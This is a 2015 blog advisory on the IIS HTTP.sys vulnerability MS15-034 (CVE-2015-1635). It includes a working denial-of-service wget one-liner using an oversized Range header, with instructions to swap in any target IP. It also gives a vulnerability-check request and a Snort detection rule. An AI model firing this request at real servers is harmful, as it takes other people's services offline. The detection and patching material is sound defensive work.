DOS

All posts tagged DOS

IIS server vulnerability (MS15-034)

Posted by R.Dunne on April 17, 2015
Posted in: IIS server vulnerability (MS15-034). Tagged: , , , , . Leave a comment

The vulnerability could allow remote code execution if an attacker sends a specially crafted HTTP request to an affected Windows system. Pic 5

Denial of Service (DoS) exploits are widely available to exploit CVE-2015-1635, a vulnerability in HTTP.sys, affecting Internet Information Server (IIS) . The patch was released on Tuesday (April 14th) as part of Microsoft’s Patch Tuesday.

CVE

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1635
KB Number 3042553
https://support.microsoft.com/en-us/kb/3042553
Summary
The vulnerability could allow remote code execution if an attacker sends a specially crafted HTTP request to an affected Windows system. The security update addresses the vulnerability by modifying how the Windows HTTP stack handles requests.
Attack Vectors
To exploit this vulnerability, an attacker would have to send a specially crafted HTTP request to the affected system.
Affected software Windows 7, Windows 8, Windows 8.1, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2
Also note this exploit works over SSL meaning it can used to bypass your IDS or other network protections.

DOS Exploit

Add the IP you desire to exploit where I have 127.0.0.1. Noted that this has to be a static file.

wget --header="Range: bytes=18-18446744073709551615" http://127.0.0.1/welcome.png

Pic 1

Results is the server is now unavailable.

Pic 2

Python Script to Test

Just change the IP inside the file and run within Python.

Pic 4

Results of the test.

Pic 3

Link to the file Link

Request Check

Send the following request to your IIS server:

GET / HTTP/1.1
Host: MS15034
Range: bytes=0-18446744073709551615

If the server responds with “Requested Header Range Not Satisfiable”, then you may be vulnerable. Results may be inconclusive as Erratasec has stated.

“I suspect the biggest reason is that the “Range” header only is parsed when there is a static file being served. If a script generates the page, then it’ll ignore the range. I also suspect that virtual-hosting gets in the way — that unless the correct DNS name is provided, then it’ll reject the request.
Thus, the testing is inconclusive. While I can find some vulnerable responses, just because a server gives me some other response doesn’t mean it’s not also vulnerable. Thus, I can’t really say anything about the extent of the vulnerability.”

Snort Rule

alert tcp $EXTERNL_NET any -> $HOME_NET 80 (msg: ” MS15-034 Range Header HTTP.sys Exploit”; content: “|0d 0a|Range: bytes=”; nocase; content: “-“; within: 20 ; byte_test: 10,>,1000000000,0,relative,string,dec ; sid: 1001239;)
(byte_test is limited to 10 bytes, so I just check if the first 10 bytes are larger then 1000000000)